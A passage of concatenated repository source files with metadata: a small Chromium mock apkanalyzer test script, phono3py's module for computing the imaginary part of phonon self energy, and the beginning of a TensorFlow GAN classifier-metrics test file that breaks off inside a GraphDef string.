"bytes": "149965"
},
{
"name": "HTML",
"bytes": "29434"
},
{
"name": "JavaScript",
"bytes": "1677725"
},
{
"name": "Perl",
"bytes": "857"
},
{
"name": "Python",
"bytes": "505683"
},
{
"name": "Ruby",
"bytes": "1950"
},
{
"name": "Shell",
"bytes": "1045"
}
],
"symlink_target": ""
} |
import os
import sys
_SCRIPT_DIR = os.path.dirname(__file__)
_OUTPUT_FILE = os.path.join(_SCRIPT_DIR, 'apkanalyzer.output')


def main():
    """Validate the APK path on argv and replay the canned output."""
    # Without a proguard mapping file, the last argument is the apk_path.
    apk_path = sys.argv[-1]
    assert os.path.exists(apk_path), 'Apk does not exist: {}'.format(apk_path)
    with open(_OUTPUT_FILE, 'r') as canned:
        sys.stdout.write(canned.read())


if __name__ == '__main__':
    main()
| {
"content_hash": "4621388f5ea38fed48fcf10f9bd924d2",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 76,
"avg_line_length": 23.38888888888889,
"alnum_prop": 0.6484560570071259,
"repo_name": "endlessm/chromium-browser",
"id": "79d149a7b2f8ca0913560721ba59723f79f2b262",
"size": "585",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tools/binary_size/libsupersize/testdata/mock_sdk/tools/bin/mock_apkanalyzer.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
} |
import sys
import numpy as np
from phonopy.units import Hbar, EV, THz
from phonopy.phonon.degeneracy import degenerate_sets
from phono3py.phonon3.triplets import get_triplets_integration_weights
from phono3py.phonon.func import bose_einstein
from phono3py.file_IO import (write_gamma_detail_to_hdf5,
write_imag_self_energy_at_grid_point)
def get_imag_self_energy(interaction,
                         grid_points,
                         temperatures,
                         sigmas=None,
                         frequency_points=None,
                         frequency_step=None,
                         num_frequency_points=None,
                         num_points_in_batch=None,
                         scattering_event_class=None,  # class 1 or 2
                         write_gamma_detail=False,
                         return_gamma_detail=False,
                         output_filename=None,
                         log_level=0):
    """Imaginary part of self energy at frequency points
    Band indices to be calculated at are kept in Interaction instance.
    Parameters
    ----------
    interaction : Interaction
        Ph-ph interaction.
    grid_points : array_like
        Grid-point indices where imag-self-energies are calculated.
        dtype=int, shape=(grid_points,)
    temperatures : array_like
        Temperatures where imag-self-energies are calculated.
        dtype=float, shape=(temperatures,)
    sigmas : array_like, optional
        A set of sigmas. sigmas=[None, ] means to use tetrahedron method,
        otherwise smearing method with real positive value of sigma.
        For example, sigmas=[None, 0.01, 0.03] is possible. Default is None,
        which results in [None, ].
        dtype=float, shape=(sigmas,)
    frequency_points : array_like, optional
        Frequency sampling points. Default is None. In this case,
        num_frequency_points or frequency_step is used to generate uniform
        frequency sampling points.
        dtype=float, shape=(frequency_points,)
    frequency_step : float, optional
        Uniform pitch of frequency sampling points. Default is None. This
        results in using num_frequency_points.
    num_frequency_points: int, optional
        Number of sampling points to be used instead of
        frequency_step. This number includes end points. Default is None,
        which gives 201.
    num_points_in_batch: int, optional
        Number of sampling points in one batch. This is for the frequency
        sampling mode and the sampling points are divided into batches.
        Larger number provides efficient use of multi-cores but is more
        memory demanding. Default is None, which gives the number of 10.
    scattering_event_class : int, optional
        Specific choice of scattering event class, 1 or 2 that is specified
        1 or 2, respectively. The result is stored in gammas. Therefore
        usual gammas are not stored in the variable. Default is None, which
        doesn't specify scattering_event_class.
    write_gamma_detail : bool, optional
        Detailed gammas are written into a file in hdf5. Default is False.
    return_gamma_detail : bool, optional
        With True, detailed gammas are returned. Default is False.
    log_level: int
        Log level. Default is 0.
    Returns
    -------
    tuple :
        (frequency_points, gammas) are returned. With return_gamma_detail=True,
        (frequency_points, gammas, detailed_gammas) are returned.
    """
    # Default integration scheme is the tetrahedron method ([None]).
    if sigmas is None:
        _sigmas = [None, ]
    else:
        _sigmas = sigmas
    # Zero entries in the third get_phonons() element flag phonons not
    # yet solved on the mesh -- presumably "done" flags; run the solver.
    if (interaction.get_phonons()[2] == 0).any():
        if log_level:
            print("Running harmonic phonon calculations...")
        interaction.run_phonon_solver()
    mesh = interaction.mesh_numbers
    frequencies = interaction.get_phonons()[0]
    max_phonon_freq = np.amax(frequencies)
    _frequency_points = get_frequency_points(
        max_phonon_freq=max_phonon_freq,
        sigmas=_sigmas,
        frequency_points=frequency_points,
        frequency_step=frequency_step,
        num_frequency_points=num_frequency_points)
    ise = ImagSelfEnergy(
        interaction, with_detail=(write_gamma_detail or return_gamma_detail))
    # Result buffer: [grid_point][sigma][temperature][band][freq_point]
    gamma = np.zeros(
        (len(grid_points), len(_sigmas), len(temperatures),
         len(interaction.band_indices), len(_frequency_points)),
        dtype='double', order='C')
    detailed_gamma = []
    for i, gp in enumerate(grid_points):
        ise.set_grid_point(gp)
        if log_level:
            weights = interaction.get_triplets_at_q()[1]
            print("------------------- Imaginary part of self energy (%d/%d) "
                  "-------------------" % (i + 1, len(grid_points)))
            print("Grid point: %d" % gp)
            print("Number of ir-triplets: "
                  "%d / %d" % (len(weights), weights.sum()))
        ise.run_interaction()
        if log_level:
            adrs = interaction.grid_address[gp]
            q = adrs.astype('double') / mesh
            print("q-point: %s" % q)
            print("Phonon frequency:")
            text = "[ "
            # Wrap the frequency listing at six values per line.
            for bi, freq in enumerate(frequencies[gp]):
                if bi % 6 == 0 and bi != 0:
                    text += "\n"
                text += "%8.4f " % freq
            text += "]"
            print(text)
            sys.stdout.flush()
        if write_gamma_detail or return_gamma_detail:
            (triplets, weights,
             map_triplets, _) = interaction.get_triplets_at_q()
            num_band0 = len(interaction.band_indices)
            num_band = frequencies.shape[1]
            # Per-triplet decomposition buffer for this grid point.
            detailed_gamma_at_gp = np.zeros(
                (len(_sigmas), len(temperatures), len(_frequency_points),
                 len(weights), num_band0, num_band, num_band),
                dtype='double')
        else:
            detailed_gamma_at_gp = None
        for j, sigma in enumerate(_sigmas):
            if log_level:
                if sigma:
                    print("Sigma: %s" % sigma)
                else:
                    print("Tetrahedron method is used for BZ integration.")
            ise.set_sigma(sigma)
            # Run one by one at frequency points
            if detailed_gamma_at_gp is None:
                detailed_gamma_at_gp_at_j = None
            else:
                detailed_gamma_at_gp_at_j = detailed_gamma_at_gp[j]
            run_ise_at_frequency_points_batch(
                _frequency_points,
                ise,
                temperatures,
                gamma[i, j],
                write_gamma_detail=write_gamma_detail,
                return_gamma_detail=return_gamma_detail,
                detailed_gamma_at_gp=detailed_gamma_at_gp_at_j,
                scattering_event_class=scattering_event_class,
                nelems_in_batch=num_points_in_batch,
                log_level=log_level)
            if write_gamma_detail:
                full_filename = write_gamma_detail_to_hdf5(
                    temperatures,
                    mesh,
                    gamma_detail=detailed_gamma_at_gp[j],
                    grid_point=gp,
                    triplet=triplets,
                    weight=weights,
                    triplet_map=map_triplets,
                    sigma=sigma,
                    frequency_points=_frequency_points,
                    filename=output_filename)
                if log_level:
                    print("Contribution of each triplet to imaginary part of "
                          "self energy is written in\n\"%s\"." % full_filename)
        if return_gamma_detail:
            detailed_gamma.append(detailed_gamma_at_gp)
    if return_gamma_detail:
        return _frequency_points, gamma, detailed_gamma
    else:
        return _frequency_points, gamma
def get_frequency_points(max_phonon_freq=None,
                         sigmas=None,
                         frequency_points=None,
                         frequency_step=None,
                         num_frequency_points=None):
    """Return frequency sampling points as a 'double' ndarray.

    Explicit frequency_points are passed through (converted to ndarray);
    otherwise a uniform grid from 0 up to slightly more than twice the
    maximum phonon frequency is generated, padded by 4 * max(sigma) when
    smearing widths are supplied.
    """
    if frequency_points is not None:
        return np.array(frequency_points, dtype='double')
    if sigmas is None:
        smearing_widths = []
    else:
        smearing_widths = [s for s in sigmas if s is not None]
    fmax = max_phonon_freq * 2
    if smearing_widths:
        fmax = fmax + np.max(smearing_widths) * 4
    fmax *= 1.005  # small safety margin above the spectral range
    fmin = 0
    return _sample_frequency_points(
        fmin,
        fmax,
        frequency_step=frequency_step,
        num_frequency_points=num_frequency_points)
def _sample_frequency_points(f_min,
f_max,
frequency_step=None,
num_frequency_points=None):
if num_frequency_points is None:
if frequency_step is not None:
frequency_points = np.arange(
f_min, f_max, frequency_step, dtype='double')
else:
frequency_points = np.array(np.linspace(
f_min, f_max, 201), dtype='double')
else:
frequency_points = np.array(np.linspace(
f_min, f_max, num_frequency_points), dtype='double')
return frequency_points
def write_imag_self_energy(imag_self_energy,
                           mesh,
                           grid_points,
                           band_indices,
                           frequency_points,
                           temperatures,
                           sigmas,
                           scattering_event_class=None,
                           output_filename=None,
                           is_mesh_symmetry=True,
                           log_level=0):
    """Write imag-self-energy spectra to files, one file per
    (grid point, sigma, temperature, band-index group).

    imag_self_energy is indexed [grid_point][sigma][temperature][band],
    matching the gamma array built by get_imag_self_energy;
    band_indices is a sequence of band-index groups, and each group is
    averaged before writing.
    """
    for gp, ise_sigmas in zip(grid_points, imag_self_energy):
        for sigma, ise_temps in zip(sigmas, ise_sigmas):
            for t, ise in zip(temperatures, ise_temps):
                for i, bi in enumerate(band_indices):
                    # pos = running offset of group i in the flattened
                    # band axis (groups may have different lengths).
                    pos = 0
                    for j in range(i):
                        pos += len(band_indices[j])
                    filename = write_imag_self_energy_at_grid_point(
                        gp,
                        bi,
                        mesh,
                        frequency_points,
                        # Average the spectrum over the bands of group bi.
                        ise[pos:(pos + len(bi))].sum(axis=0) / len(bi),
                        sigma=sigma,
                        temperature=t,
                        scattering_event_class=scattering_event_class,
                        filename=output_filename,
                        is_mesh_symmetry=is_mesh_symmetry)
                    if log_level:
                        print("Imaginary parts of self-energies were "
                              "written to \"%s\"." % filename)
def average_by_degeneracy(imag_self_energy, band_indices, freqs_at_gp):
    """Average imag-self-energy values over degenerate phonon bands.

    Bands whose frequencies at the grid point are degenerate (as decided
    by degenerate_sets) share the mean of their values; the input array
    may be 1-D (per band) or 2-D (per frequency point, per band).
    """
    averaged = np.zeros_like(imag_self_energy)
    for degenerate_bands in degenerate_sets(freqs_at_gp):
        positions = [i for i, bi in enumerate(band_indices)
                     if bi in degenerate_bands]
        if not positions:
            continue
        if imag_self_energy.ndim == 1:
            mean_value = imag_self_energy[positions].sum() / len(positions)
            for i in positions:
                averaged[i] = mean_value
        else:
            mean_values = (imag_self_energy[:, positions].sum(axis=1) /
                           len(positions))
            for i in positions:
                averaged[:, i] = mean_values
    return averaged
class ImagSelfEnergy(object):
    def __init__(self,
                 interaction,
                 frequency_points=None,
                 temperature=None,
                 sigma=None,
                 sigma_cutoff=None,
                 with_detail=False,
                 unit_conversion=None,
                 lang='C'):
        """Prepare an imag-self-energy calculator around *interaction*.

        sigma=None selects the tetrahedron method; frequency_points=None
        selects band-indices mode; with_detail keeps the per-triplet
        decomposition; lang chooses the C kernel or the slow pure-Python
        reference implementation.
        """
        self._pp = interaction
        self._sigma = None
        self.set_sigma(sigma, sigma_cutoff=sigma_cutoff)
        self._temperature = None
        self.set_temperature(temperature)
        self._frequency_points = None
        self.set_frequency_points(frequency_points)
        self._grid_point = None
        self._lang = lang
        self._imag_self_energy = None
        self._detailed_imag_self_energy = None
        self._pp_strength = None
        self._frequencies = None
        self._triplets_at_q = None
        self._weights_at_q = None
        self._with_detail = with_detail
        self._unit_conversion = None
        self._cutoff_frequency = interaction.cutoff_frequency
        self._g = None  # integration weights
        self._g_zero = None  # Necessary elements of interaction strength
        self._g_zero_frequency_points = None
        self._g_zero_zeros = None  # always zeros for frequency sampling mode
        self._mesh = self._pp.mesh_numbers
        self._is_collision_matrix = False
        # Unit to THz of Gamma
        if unit_conversion is None:
            self._unit_conversion = (18 * np.pi / (Hbar * EV) ** 2
                                     / (2 * np.pi * THz) ** 2
                                     * EV ** 2)
        else:
            self._unit_conversion = unit_conversion
    def run(self):
        """Compute the imaginary part of the self energy.

        Allocates result buffers sized by the interaction strength, then
        dispatches to band-indices mode (one value per band) or, when
        frequency points are set, to frequency-sampling mode (one value
        per frequency point and band).
        """
        if self._pp_strength is None:
            self.run_interaction()
        num_band0 = self._pp_strength.shape[1]
        if self._frequency_points is None:
            self._imag_self_energy = np.zeros(num_band0, dtype='double')
            if self._with_detail:
                self._detailed_imag_self_energy = np.empty_like(
                    self._pp_strength)
                self._detailed_imag_self_energy[:] = 0
                self._ise_N = np.zeros_like(self._imag_self_energy)
                self._ise_U = np.zeros_like(self._imag_self_energy)
            self._run_with_band_indices()
        else:
            self._imag_self_energy = np.zeros(
                (len(self._frequency_points), num_band0),
                order='C', dtype='double')
            if self._with_detail:
                self._detailed_imag_self_energy = np.zeros(
                    (len(self._frequency_points),) + self._pp_strength.shape,
                    order='C', dtype='double')
                self._ise_N = np.zeros_like(self._imag_self_energy)
                self._ise_U = np.zeros_like(self._imag_self_energy)
            self._run_with_frequency_points()
def run_interaction(self, is_full_pp=True):
if is_full_pp or self._frequency_points is not None:
self._pp.run(lang=self._lang)
else:
self._pp.run(lang=self._lang, g_zero=self._g_zero)
self._pp_strength = self._pp.interaction_strength
    def set_integration_weights(self, scattering_event_class=None):
        """Compute triplet integration weights g for the current state.

        Band-indices mode evaluates the weights at the phonon
        frequencies of the selected bands; frequency-sampling mode at
        the preset frequency points.
        """
        if self._frequency_points is None:
            bi = self._pp.band_indices
            f_points = self._frequencies[self._grid_point][bi]
        else:
            f_points = self._frequency_points
        self._g, _g_zero = get_triplets_integration_weights(
            self._pp,
            np.array(f_points, dtype='double'),
            self._sigma,
            self._sigma_cutoff,
            is_collision_matrix=self._is_collision_matrix)
        if self._frequency_points is None:
            self._g_zero = _g_zero
        else:
            # g_zero feature can not be used in frequency sampling mode.
            # zero values of the following array shape is used in C-routine.
            # shape = [num_triplets, num_band0, num_band, num_band]
            shape = list(self._g.shape[1:])
            shape[1] = len(self._pp.band_indices)
            self._g_zero_zeros = np.zeros(shape=shape, dtype='byte', order='C')
            self._g_zero_frequency_points = _g_zero
        # NOTE(review): zeroing one component of g restricts the result
        # to a single scattering event class -- confirm the component
        # layout against get_triplets_integration_weights.
        if scattering_event_class == 1 or scattering_event_class == 2:
            self._g[scattering_event_class - 1] = 0
    def get_imag_self_energy(self):
        """Return the computed imag self energy; averaged over
        degenerate bands when a cutoff frequency is set."""
        if self._cutoff_frequency is None:
            return self._imag_self_energy
        else:
            return self._average_by_degeneracy(self._imag_self_energy)
    def get_imag_self_energy_N_and_U(self):
        """Return (Normal, Umklapp) contributions; averaged over
        degenerate bands when a cutoff frequency is set."""
        if self._cutoff_frequency is None:
            return self._ise_N, self._ise_U
        else:
            return (self._average_by_degeneracy(self._ise_N),
                    self._average_by_degeneracy(self._ise_U))
    def get_detailed_imag_self_energy(self):
        """Return the per-triplet decomposition (needs with_detail=True)."""
        return self._detailed_imag_self_energy
    def get_integration_weights(self):
        """Return (g, g_zero) prepared by set_integration_weights."""
        return self._g, self._g_zero
    def get_unit_conversion_factor(self):
        """Return the factor converting internal units to THz of Gamma."""
        return self._unit_conversion
    def set_grid_point(self, grid_point=None, stores_triplets_map=False):
        """Select the grid point to work on.

        Fetches triplets and weights from the Interaction object, clears
        the cached interaction strength, and caches phonon frequencies
        and eigenvectors; grid_point=None just clears the selection.
        """
        if grid_point is None:
            self._grid_point = None
        else:
            self._pp.set_grid_point(grid_point,
                                    stores_triplets_map=stores_triplets_map)
            self._pp_strength = None
            (self._triplets_at_q,
             self._weights_at_q) = self._pp.get_triplets_at_q()[:2]
            self._grid_point = grid_point
            self._frequencies, self._eigenvectors, _ = self._pp.get_phonons()
def set_sigma(self, sigma, sigma_cutoff=None):
if sigma is None:
self._sigma = None
else:
self._sigma = float(sigma)
if sigma_cutoff is None:
self._sigma_cutoff = None
else:
self._sigma_cutoff = float(sigma_cutoff)
self.delete_integration_weights()
def set_frequency_points(self, frequency_points):
if frequency_points is None:
self._frequency_points = None
else:
self._frequency_points = np.array(frequency_points, dtype='double')
def set_temperature(self, temperature):
if temperature is None:
self._temperature = None
else:
self._temperature = float(temperature)
    def set_averaged_pp_interaction(self, ave_pp):
        """Fill the interaction strength with band-averaged constants
        (one value per band index), normalized by the mesh size."""
        num_triplets = len(self._triplets_at_q)
        num_band = self._pp.get_primitive().get_number_of_atoms() * 3
        num_grid = np.prod(self._mesh)
        bi = self._pp.get_band_indices()
        self._pp_strength = np.zeros(
            (num_triplets, len(bi), num_band, num_band), dtype='double')
        for i, v_ave in enumerate(ave_pp):
            self._pp_strength[:, i, :, :] = v_ave / num_grid
    def set_interaction_strength(self, pp_strength):
        """Inject externally computed ph-ph interaction strength."""
        self._pp_strength = pp_strength
        self._pp.set_interaction_strength(pp_strength, g_zero=self._g_zero)
    def delete_integration_weights(self):
        """Drop cached integration weights and interaction strength."""
        self._g = None
        self._g_zero = None
        self._pp_strength = None
    def _run_with_band_indices(self):
        # Dispatch band-indices mode to the C kernel or the slow
        # pure-Python reference path; integration weights must have been
        # prepared via set_integration_weights() first.
        if self._g is not None:
            if self._lang == 'C':
                if self._with_detail:
                    # self._detailed_imag_self_energy.shape =
                    # (num_triplets, num_band0, num_band, num_band)
                    # self._imag_self_energy is also set.
                    self._run_c_detailed_with_band_indices_with_g()
                else:
                    # self._imag_self_energy.shape = (num_band0,)
                    self._run_c_with_band_indices_with_g()
            else:
                print("Running into _run_py_with_band_indices_with_g()")
                print("This routine is super slow and only for the test.")
                self._run_py_with_band_indices_with_g()
        else:
            print("get_triplets_integration_weights must be executed "
                  "before calling this method.")
            # NOTE(review): local import is redundant (sys is imported at
            # module level) and sys.exit() from a library method is harsh.
            import sys
            sys.exit(1)
    def _run_with_frequency_points(self):
        # Same dispatch as above, for frequency-sampling mode.
        if self._g is not None:
            if self._lang == 'C':
                if self._with_detail:
                    self._run_c_detailed_with_frequency_points_with_g()
                else:
                    self._run_c_with_frequency_points_with_g()
            else:
                print("Running into _run_py_with_frequency_points_with_g()")
                print("This routine is super slow and only for the test.")
                self._run_py_with_frequency_points_with_g()
        else:
            print("get_triplets_integration_weights must be executed "
                  "before calling this method.")
            import sys
            sys.exit(1)
    def _run_c_with_band_indices_with_g(self):
        # C kernel, band-indices mode: accumulates over triplets into
        # self._imag_self_energy, then converts units.
        import phono3py._phono3py as phono3c
        if self._g_zero is None:
            # No sparsity information: pass an all-zeros mask.
            _g_zero = np.zeros(self._pp_strength.shape,
                               dtype='byte', order='C')
        else:
            _g_zero = self._g_zero
        # Trailing -1 is the frequency-point index argument; the
        # frequency-points runner passes the actual index instead --
        # confirm semantics against the _phono3py C extension.
        phono3c.imag_self_energy_with_g(self._imag_self_energy,
                                        self._pp_strength,
                                        self._triplets_at_q,
                                        self._weights_at_q,
                                        self._frequencies,
                                        self._temperature,
                                        self._g,
                                        _g_zero,
                                        self._cutoff_frequency,
                                        -1)
        self._imag_self_energy *= self._unit_conversion
    def _run_c_detailed_with_band_indices_with_g(self):
        # C kernel, band-indices mode with per-triplet decomposition and
        # Normal/Umklapp split.
        import phono3py._phono3py as phono3c
        if self._g_zero is None:
            _g_zero = np.zeros(self._pp_strength.shape,
                               dtype='byte', order='C')
        else:
            _g_zero = self._g_zero
        phono3c.detailed_imag_self_energy_with_g(
            self._detailed_imag_self_energy,
            self._ise_N,  # Normal
            self._ise_U,  # Umklapp
            self._pp_strength,
            self._triplets_at_q,
            self._weights_at_q,
            self._pp.get_grid_address(),
            self._frequencies,
            self._temperature,
            self._g,
            _g_zero,
            self._cutoff_frequency)
        self._detailed_imag_self_energy *= self._unit_conversion
        self._ise_N *= self._unit_conversion
        self._ise_U *= self._unit_conversion
        # Total gamma is the sum of Normal and Umklapp parts.
        self._imag_self_energy = self._ise_N + self._ise_U
    def _run_c_with_frequency_points_with_g(self):
        # C kernel, frequency-sampling mode: one kernel call per
        # frequency point, reusing a single per-band buffer.
        import phono3py._phono3py as phono3c
        num_band0 = self._pp_strength.shape[1]
        ise_at_f = np.zeros(num_band0, dtype='double')
        for i in range(len(self._frequency_points)):
            phono3c.imag_self_energy_with_g(ise_at_f,
                                            self._pp_strength,
                                            self._triplets_at_q,
                                            self._weights_at_q,
                                            self._frequencies,
                                            self._temperature,
                                            self._g,
                                            self._g_zero_frequency_points,
                                            self._cutoff_frequency,
                                            i)
            self._imag_self_energy[i] = ise_at_f
        self._imag_self_energy *= self._unit_conversion
    def _run_c_detailed_with_frequency_points_with_g(self):
        # Detailed variant of the above; builds, for each frequency
        # point, a g buffer with that point's weights broadcast along
        # the band axis before calling the detailed kernel.
        import phono3py._phono3py as phono3c
        num_band0 = self._pp_strength.shape[1]
        g_shape = list(self._g.shape)
        g_shape[2] = num_band0
        g = np.zeros((2,) + self._pp_strength.shape, order='C', dtype='double')
        detailed_ise_at_f = np.zeros(
            self._detailed_imag_self_energy.shape[1:5],
            order='C', dtype='double')
        ise_at_f_N = np.zeros(num_band0, dtype='double')
        ise_at_f_U = np.zeros(num_band0, dtype='double')
        # g_zero sparsity cannot be used in frequency-sampling mode.
        _g_zero = np.zeros(g_shape, dtype='byte', order='C')
        for i in range(len(self._frequency_points)):
            for j in range(g.shape[2]):
                g[:, :, j, :, :] = self._g[:, :, i, :, :]
            phono3c.detailed_imag_self_energy_with_g(
                detailed_ise_at_f,
                ise_at_f_N,
                ise_at_f_U,
                self._pp_strength,
                self._triplets_at_q,
                self._weights_at_q,
                self._pp.grid_address,
                self._frequencies,
                self._temperature,
                g,
                _g_zero,
                self._cutoff_frequency)
            self._detailed_imag_self_energy[i] = (detailed_ise_at_f *
                                                  self._unit_conversion)
            self._ise_N[i] = ise_at_f_N * self._unit_conversion
            self._ise_U[i] = ise_at_f_U * self._unit_conversion
            self._imag_self_energy[i] = self._ise_N[i] + self._ise_U[i]
def _run_py_with_band_indices_with_g(self):
if self._temperature > 0:
self._ise_thm_with_band_indices()
else:
self._ise_thm_with_band_indices_0K()
    def _ise_thm_with_band_indices(self):
        """Pure-python imag self-energy at finite T for fixed band indices.

        Accumulates (n2 + n3 + 1) * g1 + (n2 - n3) * (g2 - g3) weighted by
        the ph-ph interaction strength and triplet weight, then applies the
        unit conversion.
        """
        # Occupation numbers for the 2nd and 3rd phonons of each triplet;
        # frequencies below the cutoff are clamped to 1 to avoid a
        # divide-by-zero in bose_einstein (those terms are skipped below).
        freqs = self._frequencies[self._triplets_at_q[:, [1, 2]]]
        freqs = np.where(freqs > self._cutoff_frequency, freqs, 1)
        n = bose_einstein(freqs, self._temperature)
        for i, (tp, w, interaction) in enumerate(zip(self._triplets_at_q,
                                                     self._weights_at_q,
                                                     self._pp_strength)):
            for j, k in list(np.ndindex(interaction.shape[1:])):
                f1 = self._frequencies[tp[1]][j]
                f2 = self._frequencies[tp[2]][k]
                if (f1 > self._cutoff_frequency and
                    f2 > self._cutoff_frequency):
                    n2 = n[i, 0, j]
                    n3 = n[i, 1, k]
                    g1 = self._g[0, i, :, j, k]
                    g2_g3 = self._g[1, i, :, j, k] # g2 - g3
                    self._imag_self_energy[:] += (
                        (n2 + n3 + 1) * g1 +
                        (n2 - n3) * (g2_g3)) * interaction[:, j, k] * w
        self._imag_self_energy *= self._unit_conversion
def _ise_thm_with_band_indices_0K(self):
for i, (w, interaction) in enumerate(zip(self._weights_at_q,
self._pp_strength)):
for j, k in list(np.ndindex(interaction.shape[1:])):
g1 = self._g[0, i, :, j, k]
self._imag_self_energy[:] += g1 * interaction[:, j, k] * w
self._imag_self_energy *= self._unit_conversion
def _run_py_with_frequency_points_with_g(self):
if self._temperature > 0:
self._ise_thm_with_frequency_points()
else:
self._ise_thm_with_frequency_points_0K()
    def _ise_thm_with_frequency_points(self):
        """Pure-python imag self-energy at finite T at frequency points.

        Same accumulation as the band-index variant, but the extra band-0
        axis (index ``l``) is looped explicitly because g1/g2_g3 carry the
        frequency-point axis here.
        """
        for i, (tp, w, interaction) in enumerate(zip(self._triplets_at_q,
                                                     self._weights_at_q,
                                                     self._pp_strength)):
            for j, k in list(np.ndindex(interaction.shape[1:])):
                f1 = self._frequencies[tp[1]][j]
                f2 = self._frequencies[tp[2]][k]
                if (f1 > self._cutoff_frequency and
                    f2 > self._cutoff_frequency):
                    n2 = bose_einstein(f1, self._temperature)
                    n3 = bose_einstein(f2, self._temperature)
                    g1 = self._g[0, i, :, j, k]
                    g2_g3 = self._g[1, i, :, j, k] # g2 - g3
                    for l in range(len(interaction)):
                        self._imag_self_energy[:, l] += (
                            (n2 + n3 + 1) * g1 +
                            (n2 - n3) * (g2_g3)) * interaction[l, j, k] * w
        self._imag_self_energy *= self._unit_conversion
def _ise_thm_with_frequency_points_0K(self):
for i, (w, interaction) in enumerate(zip(self._weights_at_q,
self._pp_strength)):
for j, k in list(np.ndindex(interaction.shape[1:])):
g1 = self._g[0, i, :, j, k]
for l in range(len(interaction)):
self._imag_self_energy[:, l] += g1 * interaction[l, j, k] * w
self._imag_self_energy *= self._unit_conversion
    def _average_by_degeneracy(self, imag_self_energy):
        """Delegate to the module-level ``average_by_degeneracy`` using the
        band indices and the frequencies at the current grid point."""
        return average_by_degeneracy(imag_self_energy,
                                     self._pp.band_indices,
                                     self._frequencies[self._grid_point])
def run_ise_at_frequency_points_batch(
        _frequency_points,
        ise,
        temperatures,
        gamma,
        write_gamma_detail=False,
        return_gamma_detail=False,
        detailed_gamma_at_gp=None,
        scattering_event_class=None,
        nelems_in_batch=50,
        log_level=0):
    """Run an imag-self-energy calculation over frequency points in batches.

    Frequency points are split into batches of ``nelems_in_batch`` so the
    integration weights are only held for one batch at a time.  For every
    batch and temperature, ``ise`` is run and its results are scattered
    in-place into ``gamma`` (indexed ``[i_temp, :, i_freq_point]``) and,
    when requested, into ``detailed_gamma_at_gp``.

    Parameters
    ----------
    _frequency_points : ndarray
        Sampling frequency points.
    ise : object
        Must provide set_frequency_points, set_integration_weights,
        set_temperature, run, get_imag_self_energy and
        get_detailed_imag_self_energy.
    temperatures : sequence of float
        Temperatures at which gamma is computed.
    gamma : ndarray
        Output array written in-place.
    write_gamma_detail, return_gamma_detail : bool
        When either is True, ``detailed_gamma_at_gp`` is filled in-place
        (it must not be None in that case).
    scattering_event_class : int or None
        Forwarded to ``ise.set_integration_weights``.
    nelems_in_batch : int or None
        Batch size; ``None`` falls back to 10.
    log_level : int
        Non-zero prints batch progress.
    """
    _nelems_in_batch = 10 if nelems_in_batch is None else nelems_in_batch
    batches = _get_batches(len(_frequency_points), _nelems_in_batch)
    if log_level:
        # Typo fix in the progress message: "devided" -> "divided".
        print("Calculations at %d frequency points are divided into "
              "%d batches." % (len(_frequency_points), len(batches)))
    for bi, fpts_batch in enumerate(batches):
        if log_level:
            # fpts_batch + 1 shows human-friendly 1-based point indices.
            print("%d/%d: %s" % (bi + 1, len(batches), fpts_batch + 1))
            sys.stdout.flush()
        ise.set_frequency_points(_frequency_points[fpts_batch])
        ise.set_integration_weights(
            scattering_event_class=scattering_event_class)
        for l, t in enumerate(temperatures):
            ise.set_temperature(t)
            ise.run()
            gamma[l, :, fpts_batch] = ise.get_imag_self_energy()
            if write_gamma_detail or return_gamma_detail:
                detailed_gamma_at_gp[l, fpts_batch] = (
                    ise.get_detailed_imag_self_energy())
def _get_batches(tot_nelems, nelems=10):
nbatch = tot_nelems // nelems
batches = [np.arange(i * nelems, (i + 1) * nelems)
for i in range(nbatch)]
if tot_nelems % nelems > 0:
batches.append(np.arange(nelems * nbatch, tot_nelems))
return batches
| {
"content_hash": "43f1b114e39c3d1a04d5d25ea22e5de8",
"timestamp": "",
"source": "github",
"line_count": 747,
"max_line_length": 81,
"avg_line_length": 40.32797858099063,
"alnum_prop": 0.5163153526970954,
"repo_name": "atztogo/phono3py",
"id": "4ecafff7f05b27bc32dfdc0d7426e7b1b4affc80",
"size": "31708",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "phono3py/phonon3/imag_self_energy.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "246"
},
{
"name": "C",
"bytes": "464971"
},
{
"name": "C++",
"bytes": "10277"
},
{
"name": "Python",
"bytes": "648829"
},
{
"name": "Shell",
"bytes": "1490"
}
],
"symlink_target": ""
} |
"""Tests for TFGAN classifier_metrics."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import tarfile
import tempfile
import numpy as np
from scipy import linalg as scp_linalg
from google.protobuf import text_format
from tensorflow.contrib.gan.python.eval.python import classifier_metrics_impl as classifier_metrics
from tensorflow.core.framework import graph_pb2
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
mock = test.mock
def _numpy_softmax(x):
e_x = np.exp(x - np.max(x, axis=1)[:, None])
return e_x / np.sum(e_x, axis=1)[:, None]
def _expected_inception_score(logits):
  """NumPy reference: exp of the mean per-example KL(p(y|x) || p(y))."""
  probs = _numpy_softmax(logits)
  marginal = np.expand_dims(np.mean(probs, 0), 0)
  kl_per_example = (probs * (np.log(probs) - np.log(marginal))).sum(axis=1)
  return np.exp(kl_per_example.mean())
def _expected_fid(real_imgs, gen_imgs):
m = np.mean(real_imgs, axis=0)
m_v = np.mean(gen_imgs, axis=0)
sigma = np.cov(real_imgs, rowvar=False)
sigma_v = np.cov(gen_imgs, rowvar=False)
sqcc = scp_linalg.sqrtm(np.dot(sigma, sigma_v))
mean = np.square(m - m_v).sum()
trace = np.trace(sigma + sigma_v - 2 * sqcc)
fid = mean + trace
return fid
def _expected_trace_sqrt_product(sigma, sigma_v):
return np.trace(scp_linalg.sqrtm(np.dot(sigma, sigma_v)))
# A dummy GraphDef string with the minimum number of Ops.
graphdef_string = """
node {
name: "Mul"
op: "Placeholder"
attr {
key: "dtype"
value {
type: DT_FLOAT
}
}
attr {
key: "shape"
value {
shape {
dim {
size: -1
}
dim {
size: 299
}
dim {
size: 299
}
dim {
size: 3
}
}
}
}
}
node {
name: "logits"
op: "Placeholder"
attr {
key: "dtype"
value {
type: DT_FLOAT
}
}
attr {
key: "shape"
value {
